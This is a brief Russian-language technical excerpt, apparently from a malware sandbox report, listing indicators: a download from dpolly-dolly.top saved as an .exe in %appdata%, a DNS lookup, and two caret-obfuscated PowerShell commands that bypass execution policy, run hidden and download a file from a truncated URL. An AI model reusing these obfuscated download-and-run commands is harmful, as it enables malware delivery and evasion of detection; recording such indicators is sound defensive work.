Техническая информация
- http://dpolly-dolly.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^werShel^l^.^EXE^ ^-E^Xec^UTIon^pOLi^c^Y bYPA^s^S^ -n^o^P^R^O^fILE^ ^-WiN^doW^S^t^Y^le^ HID^d^E^N^ ^(ne^W-O^b^jECT ^S^YstE^m.Net.WE^b^CL^i^ENt).dO^WNLOa^DFi^lE^(^'http:/...
- DNS ASK dp####-dolly.top
- '<SYSTEM32>\cmd.exe' /C "P^o^werShel^l^.^EXE^ ^-E^Xec^UTIon^pOLi^c^Y bYPA^s^S^ -n^o^P^R^O^fILE^ ^-WiN^doW^S^t^Y^le^ HID^d^E^N^ ^(ne^W-O^b^jECT ^S^YstE^m.Net.WE^b^CL^i^ENt).dO^WNLOa^DFi^lE^(^'http:/...' (со скрытым окном)